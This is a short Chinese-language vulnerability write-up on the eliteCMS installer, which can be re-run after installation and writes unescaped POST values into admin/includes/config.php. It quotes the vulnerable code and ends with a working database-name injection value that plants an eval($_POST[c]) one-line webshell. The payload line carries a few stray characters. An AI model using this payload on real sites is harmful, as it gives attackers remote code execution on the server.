eliteCMS 的安装程序在安装结束后未作锁定，导致黑客可以通过访问安装程序地址重复执行安装。
另一个漏洞是安装程序可将一句话木马直接写入 admin/includes/config.php。
我们来看代码：
...
elseif ($_GET['step'] == "4") {
$file = "../admin/includes/config.php";
$write = "<?php\n";
$write .= "/**\n";
$write .= "*\n";
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
$write .= "*\n";
$write .= "*/\n";
$write .= "\n";
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
$write .= "if (!\$connection) {\n";
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$write .= " \n";
$write .= "} \n";
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
$write .= "if (!\$db_select) {\n";
$write .= " die(\"Database select failed\" .mysql_error());\n";
$write .= " \n";
$write .= "} \n";
$write .= "?>\n";

$writer = fopen($file, 'w');
...
再看代码：
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
上述取值未作任何验证或转义，便被原样拼接进生成的 config.php 源码中。
如果将数据库名POST数据:
& n6 G4 T& W- p"?><?php eval($_POST[c]);?><?php
将导致一句话后门写入/admin/includes/config.php